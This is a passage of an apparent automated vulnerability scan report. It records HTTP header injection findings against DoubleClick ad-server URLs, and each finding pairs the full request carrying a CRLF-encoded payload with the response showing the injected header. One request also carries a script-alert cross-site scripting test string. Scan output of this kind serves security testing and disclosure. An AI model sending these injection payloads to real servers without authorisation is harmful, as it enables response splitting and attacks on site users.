GET /76332%0d%0a35da929143b/N884.AccuWeather/B4902356.7 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/76332
35da929143b
/N884.AccuWeather/B4902356.7:
Date: Thu, 03 Feb 2011 19:03:52 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.13. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.71 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.71

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2b019%0d%0a08096ae334b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2b019%0d%0a08096ae334b/N884.AccuWeather/B4902356.71;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2b019
08096ae334b
/N884.AccuWeather/B4902356.71%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:52 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.14. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.73 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.73

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 26b83%0d%0a06496caf30a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /26b83%0d%0a06496caf30a/N884.AccuWeather/B4902356.73;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/26b83
06496caf30a
/N884.AccuWeather/B4902356.73%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:54 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.15. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.74 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.74

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 10128%0d%0a21b85e9ff66 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /10128%0d%0a21b85e9ff66/N884.AccuWeather/B4902356.74;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/10128
21b85e9ff66
/N884.AccuWeather/B4902356.74%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:54 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.16. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.135

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6b858%0d%0a3e3badc21b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6b858%0d%0a3e3badc21b0/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6b858
3e3badc21b0
/N3285.google/B2343920.135;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Thu, 03 Feb 2011 18:54:12 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.17. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 189f2%0d%0afcaa5df54c2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /189f2%0d%0afcaa5df54c2/N553.158901.DATAXU/B4970757.4;sz=728x90;pc=[TPAS_ID];ord=920452258? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/189f2
fcaa5df54c2
/N553.158901.DATAXU/B4970757.4%3Bsz%3D728x90%3Bpc%3D%5BTPAS_ID%5D%3Bord%3D920452258:
Date: Thu, 03 Feb 2011 16:04:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.18. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.GoogleFinance/B5133220.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3f5bf%0d%0ae563ac11b96 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3f5bf%0d%0ae563ac11b96/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3f5bf
e563ac11b96
/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Thu, 03 Feb 2011 16:05:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.19. http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/ocr.sant.ocregister/homepage

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 71e0e%0d%0ae9a1d806e67 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /71e0e%0d%0ae9a1d806e67/ocr.sant.ocregister/homepage;s1=homepage;pos=1;dcode=ocr;pcode=sant;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=1;sz=728x90;c1=uncategorized;ord=3300234652124345.5? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/71e0e
e9a1d806e67
/ocr.sant.ocregister/homepage%3Bs1%3Dhomepage%3Bpos%3D1%3Bdcode%3Docr%3Bpcode%3Dsant%3Bkw%3D%3Bref%3D:
Date: Thu, 03 Feb 2011 18:53:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.20. http://ad.doubleclick.net/adj/N3285.google/B2343920.135 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3285.google/B2343920.135

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 57a59%0d%0a2e93fa0572a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /57a59%0d%0a2e93fa0572a/N3285.google/B2343920.135;abr=!ie;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/57a59
2e93fa0572a
/N3285.google/B2343920.135;abr=!ie;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Thu, 03 Feb 2011 19:04:01 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.21. http://ad.doubleclick.net/adj/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.158901.DATAXU/B4970757.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1e148%0d%0afd24d678fa4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1e148%0d%0afd24d678fa4/N553.158901.DATAXU/B4970757.4 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1e148
fd24d678fa4
/N553.158901.DATAXU/B4970757.4:
Date: Thu, 03 Feb 2011 16:09:02 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.22. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5164c%0d%0a54d8039e672 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5164c%0d%0a54d8039e672/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5164c
54d8039e672
/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Thu, 03 Feb 2011 16:07:00 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.23. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8eb0e%0d%0a1a688a7e3f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8eb0e%0d%0a1a688a7e3f5/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8eb0e
1a688a7e3f5
/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http: //googleads.g.doubleclick.net/aclk
Date: Thu, 03 Feb 2011 16:09:08 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.24. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4e029%0d%0a8d39dccd6e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4e029%0d%0a8d39dccd6e9/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4e029
8d39dccd6e9
/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http: //googleads.g.doubleclick.net/aclk
Date: Thu, 03 Feb 2011 16:07:29 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.25. http://ad.doubleclick.net/adj/accuwx.us.radarandmaps/satellite [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/accuwx.us.radarandmaps/satellite

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 42370%0d%0ad7fc4ebae71 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /42370%0d%0ad7fc4ebae71/accuwx.us.radarandmaps/satellite;qcs=3834;qcs=3833;qcs=3830;qcs=3828;qcs=3825;qcs=3824;qcs=3823;qcs=3821;qcs=3806;qcs=3701;qcs=3700;qcs=2639;qcs=2620;qcs=2619;qcs=1974;pos=top;sz=980x30,728x90;tile=1;ord=372440784703940160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.accuweather.com/us/satellite/ei/us_/satellite.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/42370
d7fc4ebae71
/accuwx.us.radarandmaps/satellite%3Bqcs%3D3834%3Bqcs%3D3833%3Bqcs%3D3830%3Bqcs%3D3828%3Bqcs%3D3825%3Bqcs%3D3824%3Bqcs%3D3823%3Bqcs%3D3821%3Bqcs%3D3806%3Bqcs%3D3701%3Bqcs%3D3700%3Bqcs%3D2639%3Bqcs%3D2620%3Bqcs%3D2619%3Bqcs%3D1974%3Bpos%3Dtop%3Bsz%3D980x30%2C728x90%3Btile%3D1%3Bord%3D372440784703940160:
Date: Thu, 03 Feb 2011 18:53:19 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.26. http://ad.doubleclick.net/adj/locm.pp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/locm.pp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4f6f6%0d%0af510117f0b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4f6f6%0d%0af510117f0b4/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4f6f6
f510117f0b4
/locm.pp%3Bdcopt%3Dist%3Bkw%3Dbanks%3Bpos%3D%3Btile%3D%3Bcity%3Ddallas_tx%3Bsz%3D350x300%3Bord%3D1296748882748:
Date: Thu, 03 Feb 2011 16:03:03 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.27. http://ad.doubleclick.net/adj/locm.sp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/locm.sp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3fae6%0d%0a7ebdf66e13 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3fae6%0d%0a7ebdf66e13/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=170x150;ord=1296748812638? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&sz=170x150&ord=1296748812638&k=banks&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3fae6
7ebdf66e13
/locm.sp%3Bdcopt%3Dist%3Bkw%3Dbanks%3Bpos%3D%3Btile%3D%3Bcity%3Ddallas_tx%3Bsz%3D170x150%3Bord%3D1296748812638:
Date: Thu, 03 Feb 2011 16:08:40 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.28. http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/locm.sp/retail_banks_15020100

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4b813%0d%0a38c9ae3db10 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4b813%0d%0a38c9ae3db10/locm.sp/retail_banks_15020100 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4b813
38c9ae3db10
/locm.sp/retail_banks_15020100:
Date: Thu, 03 Feb 2011 16:08:48 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.29. http://ad.doubleclick.net/adj/ocr.sant.ocregister/homepage [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ocr.sant.ocregister/homepage

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7157e%0d%0a28bf7eec74 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7157e%0d%0a28bf7eec74/ocr.sant.ocregister/homepage HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7157e
28bf7eec74
